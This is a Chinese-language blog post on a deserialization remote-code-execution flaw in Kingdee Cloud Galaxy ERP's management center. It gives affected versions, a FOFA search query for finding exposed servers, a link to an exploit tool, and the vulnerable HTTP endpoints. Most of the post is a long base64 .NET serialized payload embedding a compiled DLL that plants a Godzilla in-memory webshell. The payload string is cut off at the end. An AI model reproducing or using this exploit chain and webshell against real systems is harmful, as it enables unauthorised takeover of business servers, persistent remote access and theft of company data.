金蝶erp反序列化RCE+哥斯拉記憶體馬

拾瑾發表於2024-11-18

記憶體

漏洞介紹

由於金蝶雲星空管理中心在處理序列化資料時，未對資料進行簽名或校驗，攻擊手可以寫入包含惡意程式碼的序列化資料，系統在進行反序列化時造成遠端命令執行，該“管理中心“是提供給管理員使用的管理端，預設開放於8000埠。

影響版本

6.x版本：低於6.2.1012.4
7.x版本：7.0.352.16 至 7.7.0.202111
8.x版本：8.0.0.202205 至 8.1.0.20221110

Fofa語句

app="金蝶雲星空-管理中心"

利用工具

https://github.com/Sweelg/Kingdee-erp-Unserialize-RCE

漏洞利用

資料包

POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: your-ip
Content-Type: text/json
 
{"ap0":"asdas","format":"3"}

利用鏈

POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc?dcInfo=11 HTTP/1.1

POST /Kingdee.BOS.ServiceFacade.ServicesStub.InOutDataService.GetImportOutData.common.kdsvc HTTP/1.1

POST /k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1

哥斯拉記憶體馬

24k.aspx

 AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMdJAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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amVjdABTeXN0ZW0uV2ViAElIdHRwSGFuZGxlcgBTeXN0ZW0uV2ViLlJvdXRpbmcASVJvdXRlSGFuZGxlcgBTeXN0ZW0uV2ViLkhvc3RpbmcAVmlydHVhbFBhdGhQcm92aWRlcgBWaXJ0dWFsRmlsZQBWaXJ0dWFsRGlyZWN0b3J5AC5jdG9yAGdldF9Jc1JldXNhYmxlAEh0dHBDb250ZXh0AFByb2Nlc3NSZXF1ZXN0AFJlcXVlc3RDb250ZXh0AEdldEh0dHBIYW5kbGVyAElzUmV1c2FibGUAX3ZpcnR1YWxEaXIAX2ZpbGVDb250ZW50AEluaXRpYWxpemUASXNQYXRoVmlydHVhbABGaWxlRXhpc3RzAERpcmVjdG9yeUV4aXN0cwBHZXRGaWxlAEdldERpcmVjdG9yeQBTeXN0ZW0uV2ViLkNhY2hpbmcAQ2FjaGVEZXBlbmRlbmN5AFN5c3RlbS5Db2xsZWN0aW9ucwBJRW51bWVyYWJsZQBEYXRlVGltZQBHZXRDYWNoZURlcGVuZGVuY3kAZ2V0X0V4aXN0cwBTeXN0ZW0uSU8AU3RyZWFtAE9wZW4ARXhpc3RzAEFycmF5TGlzdABjaGlsZHJlbgBnZXRfQ2hpbGRyZW4AZGlyZWN0b3JpZXMAZ2V0X0RpcmVjdG9yaWVzAGZpbGVzAGdldF9GaWxlcwBDaGlsZHJlbgBEaXJlY3RvcmllcwBGaWxlcwBjb250ZXh0AHJlcXVlc3RDb250ZXh0AHZpcnR1YWxEaXIAZmlsZUNvbnRlbnQAdmlydHVhbFBhdGgAdmlydHVhbFBhdGhEZXBlbmRlbmNpZXMAdXRjU3RhcnQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGV1ZWRkeHN5AFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9VVEY4AENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBHZXRTdHJpbmcAZ2V0X0N1cnJlbnQASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAZ2V0X0N1cnJlbnRFeGVjdXRpb25GaWxlUGF0aABDaGFyAFN0cmluZwBUcmltRW5kAFRvTG93ZXIAZ2V0X0FwcGxpY2F0aW9uUGF0aABJbmRleE9mAGdldF9MZW5ndGgAUmVtb3ZlAExhc3RJbmRleE9mAFN1YnN0cmluZwBDb25jYXQAUmVwbGFjZQBNYXJzaGFsQnlSZWZPYmplY3QASW5pdGlhbGl6ZUxpZmV0aW1lU2VydmljZQBTeXN0ZW0uV2ViLkNvbXBpbGF0aW9uAEJ1aWxkTWFuYWdlcgBnZXRfSXNQcmVjb21waWxlZEFwcABUeXBlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFN5c3RlbS5SZWZsZWN0aW9uAEZpZWxkSW5mbwBCaW5kaW5nRmxhZ3MAR2V0RmllbGQAR2V0VmFsdWUAQm9vbGVhbgBTZXRWYWx1ZQBIb3N0aW5nRW52aXJvbm1lbnQAUmVnaXN0ZXJWaXJ0dWFsUGF0aFByb3ZpZGVyAG9wX0luZXF1YWxpdHkASHR0cFJlc3BvbnNlAGdldF9SZXNwb25zZQBDbGVhcgBzZXRfQnVmZmVyT3V0cHV0AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAUmFuZG9tAE5leHQASW50MzIARXhlY3V0ZQBFbmQAVG9TdHJpbmcASHR0cFV0aWxpdHkAVXJsRW5jb2RlAEFkZEhlYWRlcgBFeGNlcHRpb24AVmlydHVhbFBhdGhVdGlsaXR5AFRvQXBwUmVsYXRpdmUAQ29udGFpbnMAZ2V0X1ByZXZpb3VzAEdldEJ5dGVzAE1lbW9yeVN0cmVhbQBJc051bGxPckVtcHR5AEFkZAAAjrlQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBVACsAUABDAFYAMABjAG4AawBnAGUAeQBCAHoAZABIAEoAcABiAG0AYwBnAGEAMgBWADUASQBEADAAZwBJAGoATgBqAE4AbQBVAHcAWQBqAGgAaABPAFcATQB4AE4AVABJAHkATgBHAEUAaQBPAHkAQgB6AGQASABKAHAAYgBtAGMAZwBjAEcARgB6AGMAeQBBADkASQBDAEoAdwBZAFgATgB6AEkAagBzAGcAYwAzAFIAeQBhAFcANQBuAEkARwAxAGsATgBTAEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUAQwBhAFgAUgBEAGIAMgA1ADIAWgBYAEoAMABaAFgASQB1AFYARwA5AFQAZABIAEoAcABiAG0AYwBvAGIAbQBWADMASQBGAE4ANQBjADMAUgBsAGIAUwA1AFQAWgBXAE4AMQBjAG0AbAAwAGUAUwA1AEQAYwBuAGwAdwBkAEcAOQBuAGMAbQBGAHcAYQBIAGsAdQBUAFUAUQAxAFEAMwBKADUAYwBIAFIAdgBVADIAVgB5AGQAbQBsAGoAWgBWAEIAeQBiADMAWgBwAFoARwBWAHkASwBDAGsAdQBRADIAOQB0AGMASABWADAAWgBVAGgAaABjADIAZwBvAFUAMwBsAHoAZABHAFYAdABMAGwAUgBsAGUASABRAHUAUgBXADUAagBiADIAUgBwAGIAbQBjAHUAUgBHAFYAbQBZAFgAVgBzAGQAQwA1AEgAWgBYAFIAQwBlAFgAUgBsAGMAeQBoAHcAWQBYAE4AegBJAEMAcwBnAGEAMgBWADUASwBTAGsAcABMAGwASgBsAGMARwB4AGgAWQAyAFUAbwBJAGkAMABpAEwAQwBBAGkASQBpAGsANwBJAEcASgA1AGQARwBWAGIAWABTAEIAawBZAFgAUgBoAEkARAAwAGcAVQAzAGwAegBkAEcAVgB0AEwAawBOAHYAYgBuAFoAbABjAG4AUQB1AFIAbgBKAHYAYgBVAEoAaABjADIAVQAyAE4ARgBOADAAYwBtAGwAdQBaAHkAaABEAGIAMgA1ADAAWgBYAGgAMABMAGwASgBsAGMAWABWAGwAYwAzAFIAYgBjAEcARgB6AGMAMQAwAHAATwB5AEIAawBZAFgAUgBoAEkARAAwAGcAYgBtAFYAMwBJAEYATgA1AGMAMwBSAGwAYgBTADUAVABaAFcATgAxAGMAbQBsADAAZQBTADUARABjAG4AbAB3AGQARwA5AG4AYwBtAEYAdwBhAEgAawB1AFUAbQBsAHEAYgBtAFIAaABaAFcAeABOAFkAVwA1AGgAWgAyAFYAawBLAEMAawB1AFEAMwBKAGwAWQBYAFIAbABSAEcAVgBqAGMAbgBsAHcAZABHADkAeQBLAEYATgA1AGMAMwBSAGwAYgBTADUAVQBaAFgAaAAwAEwAawBWAHUAWQAyADkAawBhAFcANQBuAEwAawBSAGwAWgBtAEYAMQBiAEgAUQB1AFIAMgBWADAAUQBuAGwAMABaAFgATQBvAGEAMgBWADUASwBTAHcAZwBVADMAbAB6AGQARwBWAHQATABsAFIAbABlAEgAUQB1AFIAVwA1AGoAYgAyAFIAcABiAG0AYwB1AFIARwBWAG0AWQBYAFYAcwBkAEMANQBIAFoAWABSAEMAZQBYAFIAbABjAHkAaAByAFoAWABrAHAASwBTADUAVQBjAG0ARgB1AGMAMgBaAHYAYwBtADEARwBhAFcANQBoAGIARQBKAHMAYgAyAE4AcgBLAEcAUgBoAGQARwBFAHMASQBEAEEAcwBJAEcAUgBoAGQARwBFAHUAVABHAFYAdQBaADMAUgBvAEsAVABzAGcAYQBXAFkAZwBLAEUATgB2AGIAbgBSAGwAZQBIAFEAdQBVADIAVgB6AGMAMgBsAHYAYgBsAHMAaQBjAEcARgA1AGIARwA5AGgAWgBDAEoAZABJAEQAMAA5AEkARwA1ADEAYgBHAHcAcABJAEgAcwBnAFEAMgA5AHUAZABHAFYANABkAEMANQBUAFoAWABOAHoAYQBXADkAdQBXAHkASgB3AFkAWABsAHMAYgAyAEYAawBJAGwAMABnAFAAUwBBAG8AVQAzAGwAegBkAEcAVgB0AEwAbABKAGwAWgBtAHgAbABZADMAUgBwAGIAMgA0AHUAUQBYAE4AegBaAFcAMQBpAGIASABrAHAAZABIAGwAdwBaAFcAOQBtAEsARgBOADUAYwAzAFIAbABiAFMANQBTAFoAVwBaAHMAWgBXAE4AMABhAFcAOQB1AEwAawBGAHoAYwAyAFYAdABZAG0AeAA1AEsAUwA1AEgAWgBYAFIATgBaAFgAUgBvAGIAMgBRAG8ASQBrAHgAdgBZAFcAUQBpAEwAQwBCAHUAWgBYAGMAZwBVADMAbAB6AGQARwBWAHQATABsAFIANQBjAEcAVgBiAFgAUwBCADcASQBIAFIANQBjAEcAVgB2AFoAaQBoAGkAZQBYAFIAbABXADEAMABwAEkASAAwAHAATABrAGwAdQBkAG0AOQByAFoAUwBoAHUAZABXAHgAcwBMAEMAQgB1AFoAWABjAGcAYgAyAEoAcQBaAFcATgAwAFcAMQAwAGcAZQB5AEIAawBZAFgAUgBoAEkASAAwAHAATwB5AEEANwBJAEgAMABnAFoAVwB4AHoAWgBTAEIANwBJAEYATgA1AGMAMwBSAGwAYgBTADUASgBUAHkANQBOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgAzAFYAMABVADMAUgB5AFoAVwBGAHQASQBEADAAZwBiAG0AVgAzAEkARgBOADUAYwAzAFIAbABiAFMANQBKAFQAeQA1AE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBLAFQAcwBnAGIAMgBKAHEAWgBXAE4AMABJAEcAOABnAFAAUwBBAG8ASwBGAE4ANQBjADMAUgBsAGIAUwA1AFMAWgBXAFoAcwBaAFcATgAwAGEAVwA5AHUATABrAEYAegBjADIAVgB0AFkAbQB4ADUASwBVAE4AdgBiAG4AUgBsAGUASABRAHUAVQAyAFYAegBjADIAbAB2AGIAbABzAGkAYwBHAEYANQBiAEcAOQBoAFoAQwBKAGQASwBTADUARABjAG0AVgBoAGQARwBWAEoAYgBuAE4AMABZAFcANQBqAFoAUwBnAGkAVABGAGsAaQBLAFQAcwBnAGIAeQA1AEYAYwBYAFYAaABiAEgATQBvAFEAMgA5AHUAZABHAFYANABkAEMAawA3AEkARwA4AHUAUgBYAEYAMQBZAFcAeAB6AEsARwA5ADEAZABGAE4AMABjAG0AVgBoAGIAUwBrADcASQBHADgAdQBSAFgARgAxAFkAVwB4AHoASwBHAFIAaABkAEcARQBwAE8AeQBCAHYATABsAFIAdgBVADMAUgB5AGEAVwA1AG4ASwBDAGsANwBJAEcASgA1AGQARwBWAGIAWABTAEIAeQBJAEQAMABnAGIAMwBWADAAVQAzAFIAeQBaAFcARgB0AEwAbABSAHYAUQBYAEoAeQBZAFgAawBvAEsAVABzAGcAUQAyADkAdQBkAEcAVgA0AGQAQwA1AFMAWgBYAE4AdwBiADIANQB6AFoAUwA1AFgAYwBtAGwAMABaAFMAaAB0AFoARABVAHUAVQAzAFYAaQBjADMAUgB5AGEAVwA1AG4ASwBEAEEAcwBJAEQARQAyAEsAUwBrADcASQBFAE4AdgBiAG4AUgBsAGUASABRAHUAVQBtAFYAegBjAEcAOQB1AGMAMgBVAHUAVgAzAEoAcABkAEcAVQBvAFUAMwBsAHoAZABHAFYAdABMAGsATgB2AGIAbgBaAGwAYwBuAFEAdQBWAEcAOQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AYgBtAFYAMwBJAEYATgA1AGMAMwBSAGwAYgBTADUAVABaAFcATgAxAGMAbQBsADAAZQBTADUARABjAG4AbAB3AGQARwA5AG4AYwBtAEYAdwBhAEgAawB1AFUAbQBsAHEAYgBtAFIAaABaAFcAeABOAFkAVwA1AGgAWgAyAFYAawBLAEMAawB1AFEAMwBKAGwAWQBYAFIAbABSAFcANQBqAGMAbgBsAHcAZABHADkAeQBLAEYATgA1AGMAMwBSAGwAYgBTADUAVQBaAFgAaAAwAEwAawBWAHUAWQAyADkAawBhAFcANQBuAEwAawBSAGwAWgBtAEYAMQBiAEgAUQB1AFIAMgBWADAAUQBuAGwAMABaAFgATQBvAGEAMgBWADUASwBTAHcAZwBVADMAbAB6AGQARwBWAHQATABsAFIAbABlAEgAUQB1AFIAVwA1AGoAYgAyAFIAcABiAG0AYwB1AFIARwBWAG0AWQBYAFYAcwBkAEMANQBIAFoAWABSAEMAZQBYAFIAbABjAHkAaAByAFoAWABrAHAASwBTADUAVQBjAG0ARgB1AGMAMgBaAHYAYwBtADEARwBhAFcANQBoAGIARQBKAHMAYgAyAE4AcgBLAEgASQBzAEkARABBAHMASQBIAEkAdQBUAEcAVgB1AFoAMwBSAG8ASwBTAGsAcABPAHkAQgBEAGIAMgA1ADAAWgBYAGgAMABMAGwASgBsAGMAMwBCAHYAYgBuAE4AbABMAGwAZAB5AGEAWABSAGwASwBHADEAawBOAFMANQBUAGQAVwBKAHoAZABIAEoAcABiAG0AYwBvAE0AVABZAHAASwBUAHMAZwBmAFMAQgA5AEkARwBOAGgAZABHAE4AbwBJAEMAaABUAGUAWABOADAAWgBXADAAdQBSAFgAaABqAFoAWABCADAAYQBXADkAdQBLAFMAQgA3AEkASAAwAEsASgBUADQAPQAACy4AYQBzAHAAeAAAAQADLwAACy8AMgA0AGsALwAABS8ALwAAIV8AdABoAGUAQgB1AGkAbABkAE0AYQBuAGEAZwBlAHIAADNfAGkAcwBQAHIAZQBjAG8AbQBwAGkAbABlAGQAQQBwAHAAQwBvAG0AcAB1AHQAZQBkAAAjXwBpAHMAUAByAGUAYwBvAG0AcABpAGwAZQBkAEEAcABwAAATZwBoAG8AcwB0AGYAaQBsAGUAAA1FAHIAcgBvAHIAcwAAA1wAAAdjADoAXAAAHy8AZwBoAG8AcwB0AGYAaQBsAGUALgBhAHMAcAB4AADUefYZpMWMSLcmfCnLwAHoAAi3elxWGTTgiQiwP19/EdUKOgMgAAEDIAACBSABARIdBiABEgkSIQMoAAICBg4FIAIBDg4EIAECDgUgARIVDgUgARIZDgkgAxIlDhIpES0EIAASMQQgAQEOAwYSNQQgABIpBCgAEikEIAEBCAQAABJBBQABHQUOBSABDh0FBAAAEh0EIAASSQMgAA4FIAEOHQMEIAEIDgMgAAgFIAIOCAgFAAIODg4FIAIODg4DIAAcAwAAAgYAARJdEWEHIAISZQ4RaQQgARwcBSACARwcBQABARIRBwACAhJlEmUEIAASdQQgAQECBCAAEnkEIAEICAUAAQ4dHAQAAQ4OHQcSDg4ODggODhIQEmUSZRwcHBJdEmUSgIkdAx0cBAcBHQMDBwEOBCAAEhEFIAEdBQ4FIAEBHQUEBwESMQUAAgIODgQAAQIOBCABCBwIBwQOCBIUHQMIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAACYQgAAAAAAAAAAAACuQgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoEIAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWGAAAEwCAAAAAAAAAAAAAEwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASsAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACIAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAADwADQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZQB1AGUAZABkAHgAcwB5AC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABEAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZQB1AGUAZABkAHgAcwB5AC4AZABsAGwAAAAAADQACAABAFAAcgBvAGQAdQBjAH